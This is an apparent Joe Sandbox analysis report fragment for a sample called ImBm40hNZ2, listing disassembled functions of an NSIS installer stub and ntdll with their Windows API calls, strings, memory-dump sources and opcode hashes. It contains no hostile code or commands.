                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                                                                                                                                                • Opcode ID: 73e8ba0382c830ad19924dd23f2f2f98bea930d2f903883da69ce143c6fc22e3
                                                                                                                                                                                                                                                                • Instruction ID: bec9e42dfe10d11ae3f9da453690961036ef7877893a7332badb98976ce689fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73e8ba0382c830ad19924dd23f2f2f98bea930d2f903883da69ce143c6fc22e3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B218C71D00118BADF119FA5CC80E9EBFB9EF44358F00807AF944B6291C739AE40CBA8
                                                                                                                                                                                                                                                                Function 00404747 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404762
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 0040476A
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404784
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404796
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047BC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                                                                                                                                                                                • Instruction ID: c5a6753d0d9a08ec20861e0abf538a780563573202a5f4a853919173bafec1ff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F015275D00218BADB01DB94DC45FFEBBBCAF55711F10412BBA10B71C0C7B865018BA5
                                                                                                                                                                                                                                                                Function 00402B42 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,00000064,?), ref: 00402B88
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00402B98
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BA8
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402B92
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                • Opcode ID: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
                                                                                                                                                                                                                                                                • Instruction ID: 73eba29f4f71f0575b3f4d6169dd72a4e637aea185fae63b28e602e2a4acafde
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91016770A40208BBDF249F60DD09EEE3779AB00745F008039FA06F52D0D7B5A951CF99
                                                                                                                                                                                                                                                                Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,?,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                                                                                • String ID: B
                                                                                                                                                                                                                                                                • API String ID: 2987980305-2386870291
                                                                                                                                                                                                                                                                • Opcode ID: d115f86410b0daf91d171d1460d83b35a78a5fa87ab9381f48f71df4f6a750fe
                                                                                                                                                                                                                                                                • Instruction ID: c9057b5ece4bb598837aab6aa7fd84f94fd7ed62459683fea6a67aa899d5519e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d115f86410b0daf91d171d1460d83b35a78a5fa87ab9381f48f71df4f6a750fe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B212B32904215F7DB107FA5CE4DA6E39B0AB48358F70823BF600B62D0DBBC4D419A6E
                                                                                                                                                                                                                                                                Function 00405DFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,00434000,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E54
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,?,00000000), ref: 00405E61
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,00434000,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E66
                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?,00435400,00435400,00000000,004030BA,00435400,756A3410,00403294), ref: 00405E76
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                • Opcode ID: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                                                                                                                                                                                                                                • Instruction ID: d9f26e5b90d06d21ed3ce52f9e74cde850698f16693a1e2037ff65b0147420f0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23e10a89c186aeb9d4ae81216154e90e4a11c9f17e12c8179a136c01dc061f6b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E111C872804B9529EB3217348C44B777F99CB967A0F58047BE8D4722C2D67C5E428EAD
                                                                                                                                                                                                                                                                Function 0040173F Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000,004093C0,00434800,00000000,00000000,00000031), ref: 0040177E
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,004093C0,004093C0,00000000,00000000,004093C0,00434800,00000000,00000000,00000031), ref: 004017A8
                                                                                                                                                                                                                                                                  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,0042DBA0,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrlenA.KERNEL32(00402FBC,00429000,00000000,?,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,?,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                  • Part of subcall function 00404E7C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1941528284-0
                                                                                                                                                                                                                                                                • Opcode ID: 87cc0a09f9a596be3997dc95dd75862fa03618459af6fa845bb54b61416ad007
                                                                                                                                                                                                                                                                • Instruction ID: 4c0a073a0a50a016330575191a1a6545d3ec5be94f2f3c544cdbcd56c7493ec8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87cc0a09f9a596be3997dc95dd75862fa03618459af6fa845bb54b61416ad007
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A941C371900515BADF10BBA9DC46DAF3679DF05368B20423BF421F20E2D77C5A419AAD
                                                                                                                                                                                                                                                                Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                                                                                                                                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                                                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                • Opcode ID: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
                                                                                                                                                                                                                                                                • Instruction ID: 4f9eb0324db645217cd312817ce5f5f90673302cc8682bf6f7f2a23cea7074e4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3114C75A00008FFDF21AF90DE49EAF3B6DEB54348B104036FA05B10A0DBB49E51AF69
                                                                                                                                                                                                                                                                Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                                                                                                                                                                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                • Opcode ID: 61fc1dba9fda1762062bb2b77790a6befe8e60fa3738e2a0c52d9c777096eb7d
                                                                                                                                                                                                                                                                • Instruction ID: a37ff7ddff9b943901b48b8e13d91397296dd9e34982c61b5f8f3387a39b4807
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61fc1dba9fda1762062bb2b77790a6befe8e60fa3738e2a0c52d9c777096eb7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F012B2A05115BFE701EBA4EE89DAF77BCEB44301B108576F501F2191C7749D018B79
                                                                                                                                                                                                                                                                Function 00401D26 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00401D29
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                                                                                                                                                                                                                                • CreateFontIndirectA.GDI32(0040A7C8), ref: 00401DA1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                                                                                                                                                • Opcode ID: 5c9cd3ac56969fe30278c88d56c25a930fef8193034729040990e91125b79c66
                                                                                                                                                                                                                                                                • Instruction ID: 2cbf7b26bffa346353c04d8a5f9262401d36b0fa9ffcbdeb30b58970b6715d39
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c9cd3ac56969fe30278c88d56c25a930fef8193034729040990e91125b79c66
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46018671955380AFEB019BB0AF0AB9A3FB4E715705F20843AF141BB2E2C5B95411DB2F
                                                                                                                                                                                                                                                                Function 338FF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-3610490719
                                                                                                                                                                                                                                                                • Opcode ID: 09748759fa4b58471c6488d973d0366226bb16b6853afdae3ef48267ada9fcda
                                                                                                                                                                                                                                                                • Instruction ID: bef78a58ff90a2e0a77369113d696a010a3f66dd0b528ea1185ae8e13c208579
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09748759fa4b58471c6488d973d0366226bb16b6853afdae3ef48267ada9fcda
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7915A71B05740EFE706DF68D880B5EB7A9FF44B80F140659F8909B692DB36D881CB92
                                                                                                                                                                                                                                                                Function 33920AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 33969F2E
                                                                                                                                                                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 33969F1C
                                                                                                                                                                                                                                                                • LdrpCheckModule, xrefs: 33969F24
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                • API String ID: 3446177414-161242083
                                                                                                                                                                                                                                                                • Opcode ID: 5d464de5628b9bafdbf8a227178c6fe2350a90ea1978e5b9eab437ab5c8be6d6
                                                                                                                                                                                                                                                                • Instruction ID: ff30c36f7c19db7284e0eea8ee0c5494f30ad8db1986c4312712944897a07a38
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d464de5628b9bafdbf8a227178c6fe2350a90ea1978e5b9eab437ab5c8be6d6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8471B075E00709DFEB14EF68C890AAEBBF8EB48648F19406DE441EB755E734AD42CB50
                                                                                                                                                                                                                                                                Function 00404665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429820,00429820,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404585,000000DF,0000040F,00000400,00000000), ref: 004046F3
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 004046FB
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00429820), ref: 0040470E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17207646944.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207575897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207722697.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207800880.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17207879178.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                • Opcode ID: 469c594008fa7237e2d1d16fd7901c9f371c8ab2c4c615d53f44690512f9b9d1
                                                                                                                                                                                                                                                                • Instruction ID: 3575eb730b5e41c4f883d25dacfc3cf5faa310bf85eded31aa5be4b75c6b21fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 469c594008fa7237e2d1d16fd7901c9f371c8ab2c4c615d53f44690512f9b9d1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97110473A001243BEB0066699C05EAF369DCBC6334F14463BFA25F61D1E9B9AD1186E9
                                                                                                                                                                                                                                                                Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
